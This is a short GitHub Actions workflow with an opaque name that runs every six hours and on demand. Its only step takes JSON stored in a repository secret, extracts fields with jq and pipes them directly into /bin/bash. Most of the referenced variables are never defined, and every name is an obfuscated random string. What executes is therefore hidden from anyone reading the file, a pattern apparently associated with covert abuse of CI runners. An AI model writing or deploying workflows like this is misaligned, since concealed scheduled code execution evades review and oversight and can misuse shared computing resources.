name: chengzhuangshi6789
on:
  workflow_dispatch:
  schedule:
    - cron: '2 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chengzhuangshi6789
        env:
          jxz40: ${{ secrets.jxz40 }}
        run: |
          echo $jxz40 | jq -r .bel13 | /bin/bash
          echo $mdyi7 | jq -r .qobf08 | /bin/bash
          echo $whjhm8339 | jq -r .qfm203 | /bin/bash
          echo $ieg647 | jq -r .muih0599 | /bin/bash
          echo $qdma8 | jq -r .ct3060 | /bin/bash
          echo $bkc31638 | jq -r .w97706 | /bin/bash
          echo $szp6 | jq -r .wdaam68 | /bin/bash
          echo $keuz79 | jq -r .sgml83 | /bin/bash

